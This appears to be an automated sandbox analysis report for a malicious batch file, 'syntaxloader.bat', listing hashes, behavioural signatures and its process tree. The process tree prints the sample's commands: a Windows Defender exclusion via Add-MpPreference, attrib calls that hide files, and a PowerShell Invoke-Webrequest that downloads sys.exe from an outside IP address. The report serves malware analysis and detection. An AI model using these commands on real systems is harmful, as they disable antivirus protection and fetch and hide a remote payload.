Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08/11/2024, 21:39
Static task
static1
Behavioral task
behavioral1
Sample
syntaxloader.bat
Resource
win7-20240903-en
General
-
Target
syntaxloader.bat
-
Size
25KB
-
MD5
ea50d652e81767c52b0f8428ff1e25da
-
SHA1
430b12c8f82e58ec10a00426f506b9a0bd71489a
-
SHA256
146ef38c311af5e1375df0f2ad2f34f691b1104c35e20a610a68eb8147db7e0b
-
SHA512
60072e939c4b0b3296f699cfb9585444231fad591323c61d4fb9c41828ab41e4afb171cf036623a697ed73e9a0db68954c2f92bac032180b68ca8842390e909f
-
SSDEEP
384:7f07tvjFJnoSCZV5mbksKIyaxoxJy1KTb:j07tHoSCZqbhKIyPmKf
Malware Config
Signatures
-
pid Process 2872 powershell.exe 1824 powershell.exe 2540 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1824 powershell.exe 2540 powershell.exe 2872 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 2540 powershell.exe Token: SeDebugPrivilege 2872 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2128 wrote to memory of 1824 2128 cmd.exe 31 PID 2128 wrote to memory of 1824 2128 cmd.exe 31 PID 2128 wrote to memory of 1824 2128 cmd.exe 31 PID 2128 wrote to memory of 2064 2128 cmd.exe 32 PID 2128 wrote to memory of 2064 2128 cmd.exe 32 PID 2128 wrote to memory of 2064 2128 cmd.exe 32 PID 2128 wrote to memory of 2540 2128 cmd.exe 33 PID 2128 wrote to memory of 2540 2128 cmd.exe 33 PID 2128 wrote to memory of 2540 2128 cmd.exe 33 PID 2128 wrote to memory of 2768 2128 cmd.exe 34 PID 2128 wrote to memory of 2768 2128 cmd.exe 34 PID 2128 wrote to memory of 2768 2128 cmd.exe 34 PID 2128 wrote to memory of 2872 2128 cmd.exe 35 PID 2128 wrote to memory of 2872 2128 cmd.exe 35 PID 2128 wrote to memory of 2872 2128 cmd.exe 35 PID 2128 wrote to memory of 2096 2128 cmd.exe 36 PID 2128 wrote to memory of 2096 2128 cmd.exe 36 PID 2128 wrote to memory of 2096 2128 cmd.exe 36 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2768 attrib.exe 2096 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\syntaxloader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:2064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:2768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest '45.95.214.119/sys.exe' -OutFile sys.exe"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Anon\sys.exe" /s /d2⤵
- Views/modifies file attributes
PID:2096
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fed7ed176fe36fac865d99dc63a0e391
SHA1d62788e557b8c493b58507a1d6bafea7bdf05b7a
SHA25633d4a554a1ac7e2a3cc79d1a034136d9437559646e05700e373d692763b86048
SHA512c19b3e88b7a14d6d65a393b1d436c0518d38fa9e0f971b2e3f9081a76619aaa2c058011b407b6d78ff1778582c6d7edf64e5cb84864160677e4a7b8826f4ede9